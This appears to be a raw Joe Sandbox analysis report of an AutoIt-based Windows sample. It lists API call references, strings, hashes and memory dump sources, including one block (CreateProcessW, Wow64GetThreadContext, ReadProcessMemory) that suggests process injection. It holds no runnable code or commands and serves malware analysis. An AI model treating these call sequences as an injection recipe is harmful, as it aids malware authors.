                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                            • Instruction ID: 9f0a094f49cf9064cf0d3e41be2ceab6228693adeea463916dc582922044740b
                                                                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                            • Instruction Fuzzy Hash: 5A51C3B0A40B29DBCB249F69F98066EB7A2FF40335F248729F825D62D0D7709DD08B45
                                                                            APIs
                                                                              • Part of subcall function 00804DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E0F
                                                                            • _free.LIBCMT ref: 0083E263
                                                                            • _free.LIBCMT ref: 0083E2AA
                                                                              • Part of subcall function 00806A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                            • API String ID: 2861923089-1757145024
                                                                            • Opcode ID: 9927cd32f01121d0b2a6631dbfe2fa75eaad2d8fc94bf75450ee0f0d24ebe73e
                                                                            • Instruction ID: 78a7d5e5f0fa65ae1a607c131a9364d1b4ad713ce6482d53218740aaae8bea3c
                                                                            • Opcode Fuzzy Hash: 9927cd32f01121d0b2a6631dbfe2fa75eaad2d8fc94bf75450ee0f0d24ebe73e
                                                                            • Instruction Fuzzy Hash: 18913871900219AFCF04EFA8DC919EEB7B8FF54314F10442AF815EB2A1DB74A955CB91
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008035A1,SwapMouseButtons,00000004,?), ref: 008035D4
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 008035F5
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 00803617
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                                            • Instruction ID: f75672802f09a817490aa4cc54c1d10cc760e10365e92d84573ad9ee26e4e74e
                                                                            • Opcode Fuzzy Hash: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                                            • Instruction Fuzzy Hash: 12114871510608BFDB218FA8DC409AEB7BCFF14740F104469F905E7250D6729E40A760
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00E5475D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E54781
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E547A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1333401749.0000000000E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E52000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_e52000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction ID: 3ff59f365b7e7dcb15e6b0f94509c82a8b47184f488c741c3cc5847469ecc6ec
                                                                            • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction Fuzzy Hash: 5D623A70A14258DBEB24CFA4C840BDEB372EF58305F1095A9E50DEB2D0E7769E84CB59
                                                                            APIs
                                                                              • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                                              • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
                                                                              • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                                            • _free.LIBCMT ref: 008696A2
                                                                            • _free.LIBCMT ref: 008696A9
                                                                            • _free.LIBCMT ref: 00869714
                                                                              • Part of subcall function 00822D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00829A24), ref: 00822D69
                                                                              • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                                            • _free.LIBCMT ref: 0086971C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID:
                                                                            • API String ID: 1552873950-0
                                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                            • Instruction ID: 67706956afbd6358d3d43c670b221cf8614eda5fc495c227767f6dd3a3fe2fd5
                                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                            • Instruction Fuzzy Hash: 1D514CB1904219AFDF249F68DC81A9EBBB9FF48300F10449EF249E3281DB715A90CF59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                            • Instruction ID: 1416a75f5b83d65f4dedffecb7718a5220573ef89e456647f67f205a76741e28
                                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                            • Instruction Fuzzy Hash: 9A41D374B1076A9FDB18CF69E8809AE7BA5FF45364B24913DE825C7640DB70DDC08B60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 008044CF
                                                                              • Part of subcall function 0080407C: _memset.LIBCMT ref: 008040FC
                                                                              • Part of subcall function 0080407C: _wcscpy.LIBCMT ref: 00804150
                                                                              • Part of subcall function 0080407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00804524
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00804533
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083D4B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: a37db88c5b32e6d7b928a869d4dd100d0e1bad04f639c77779a7d86264363118
                                                                            • Instruction ID: a3469038d53c9d457232e0b4aa49f43c911167095b367f06680fec7883d5107f
                                                                            • Opcode Fuzzy Hash: a37db88c5b32e6d7b928a869d4dd100d0e1bad04f639c77779a7d86264363118
                                                                            • Instruction Fuzzy Hash: E721F5B1944784AFE7729B249C45BE6BBECFF41308F04009DE79AD6182C3742984CB85
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0083EA39
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0083EA83
                                                                              • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                                              • Part of subcall function 00820791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008207B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X
                                                                            • API String ID: 3777226403-3081909835
                                                                            • Opcode ID: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                                            • Instruction ID: 824ec198d9ffe63a07345697d29176dee1f30d15f1b63435fe5a0f03686f0f08
                                                                            • Opcode Fuzzy Hash: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                                            • Instruction Fuzzy Hash: F2216F71A102589BDB419B98DC45AEE7BF8FF49714F004059E508E7281DBB459898FA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            • Opcode ID: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                                            • Instruction ID: b7b6c646c0e9c3387c970457b1c2a459f0e4598795a2b0351ca22ad9840865e9
                                                                            • Opcode Fuzzy Hash: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                                            • Instruction Fuzzy Hash: B501F971804228BEDB18CAA8D816EFE7BFCEB11301F00419AF556D2281E874E6048B60
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 008698F8
                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0086990F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                                            • Instruction ID: f79048711561f1d86fa26ff34e76647ccc4d5830344642d522e377396cc4bb52
                                                                            • Opcode Fuzzy Hash: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                                            • Instruction Fuzzy Hash: B8D05E7958030DABDB509BA4DC0EFDA7B3CF704700F0002B1BB54D11A2EAB095988B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 762aae101467452074087507ea43e0facee8e22cce962d61faddd5c7425bf1fd
                                                                            • Instruction ID: 23ecbf04916ae2cf029c940b67f598817c80a2d922d04ea000e7108e1fd9be25
                                                                            • Opcode Fuzzy Hash: 762aae101467452074087507ea43e0facee8e22cce962d61faddd5c7425bf1fd
                                                                            • Instruction Fuzzy Hash: E2F118716083059FCB14DF28C884A6ABBE5FF89314F54892EF899DB252D770E945CF82
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00804370
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00804432
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$_memset
                                                                            • String ID:
                                                                            • API String ID: 1505330794-0
                                                                            • Opcode ID: 8869aad26d66fbe5fe09117e1efb9a68eb4fbf8b52cc0972a0ad1453f5f1cf60
                                                                            • Instruction ID: 1b39e270ce9322e0d454ff22941ebd7f2c68809bb675220b37fd14ad72546eb9
                                                                            • Opcode Fuzzy Hash: 8869aad26d66fbe5fe09117e1efb9a68eb4fbf8b52cc0972a0ad1453f5f1cf60
                                                                            • Instruction Fuzzy Hash: F43193B05057018FD760DF24DC84A9BBBF8FB58308F00192EE69AC2291D771B984CB96
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00825733
                                                                              • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A192
                                                                              • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A19C
                                                                            • __NMSG_WRITE.LIBCMT ref: 0082573A
                                                                              • Part of subcall function 0082A1C8: GetModuleFileNameW.KERNEL32(00000000,008C33BA,00000104,?,00000001,00000000), ref: 0082A25A
                                                                              • Part of subcall function 0082A1C8: ___crtMessageBoxW.LIBCMT ref: 0082A308
                                                                              • Part of subcall function 0082309F: ___crtCorExitProcess.LIBCMT ref: 008230A5
                                                                              • Part of subcall function 0082309F: ExitProcess.KERNEL32 ref: 008230AE
                                                                              • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                                            • RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,00820DD3,?), ref: 0082575F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                                            • Instruction ID: 53330f4711c5cca4d9bf97f6a87d80ab13efcd13b663173200103200e6dd1274
                                                                            • Opcode Fuzzy Hash: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                                            • Instruction Fuzzy Hash: A901DE352C0B31DEEA11273CBC96A2A7398FF82772F50042AF905DA282DE7089C14662
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00869548,?,?,?,?,?,00000004), ref: 008698BB
                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00869548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008698D1
                                                                            • CloseHandle.KERNEL32(00000000,?,00869548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008698D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                                            • Instruction ID: 216812fa413d0cffc01ad6bbd29fd0471697dbd72c11e9d021c0289312593fc7
                                                                            • Opcode Fuzzy Hash: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                                            • Instruction Fuzzy Hash: 5EE08632140214B7D7222B58EC0DFDA7B19FB06760F104120FB54A90E187B115219798
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00868D1B
                                                                              • Part of subcall function 00822D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00829A24), ref: 00822D69
                                                                              • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                                            • _free.LIBCMT ref: 00868D2C
                                                                            • _free.LIBCMT ref: 00868D3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                            • Instruction ID: 9ab6a39feaf037924826457b79e233bf944a6a16dc623bb22b59b69be66e2b0c
                                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                            • Instruction Fuzzy Hash: 8BE012B160261597DB24A57CB941A9313DCEF5C3527150A1DB50DD7186CE64F8928174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CALL
                                                                            • API String ID: 0-4196123274
                                                                            • Opcode ID: 78960515bc7ab0fc7cb8f7e1e5afe24d572f01a5a39ceaca9fcf3b64347105b0
                                                                            • Instruction ID: 4c5eff920df935d5ec0d0443489168535852499534442f4637d262277a8d29d7
                                                                            • Opcode Fuzzy Hash: 78960515bc7ab0fc7cb8f7e1e5afe24d572f01a5a39ceaca9fcf3b64347105b0
                                                                            • Instruction Fuzzy Hash: 8E225774508305DFD768DF18C890A6ABBE1FF84314F15896DE98ACB2A2D731EC45CB82
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 4104443479-3962188686
                                                                            • Opcode ID: df85cbfca70441708c48d07466d7df0e9927f17fe3d5c71cf4e3a703be09fc3c
                                                                            • Instruction ID: 64ed0c77967976b4892d97c2404113b8cb7b4e23a92ab6322e3be294c7b7ba68
                                                                            • Opcode Fuzzy Hash: df85cbfca70441708c48d07466d7df0e9927f17fe3d5c71cf4e3a703be09fc3c
                                                                            • Instruction Fuzzy Hash: 0F419CE1A8025C6BDF618B58CC517BE7FA1FF42304F286474EE82DB2C2D6349D4083A2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
